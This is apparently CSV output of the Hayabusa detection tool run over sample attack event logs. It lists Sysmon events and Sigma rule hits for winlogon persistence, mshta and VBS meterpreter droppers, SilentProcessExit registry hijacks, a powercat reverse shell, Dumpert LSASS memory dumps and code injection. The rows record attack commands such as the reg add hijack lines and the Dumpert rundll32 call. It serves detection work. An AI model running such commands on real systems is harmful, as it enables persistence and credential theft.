winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 
07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious 
Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" 
C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : 
User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence 
Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 
+09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: 
C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 
+09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
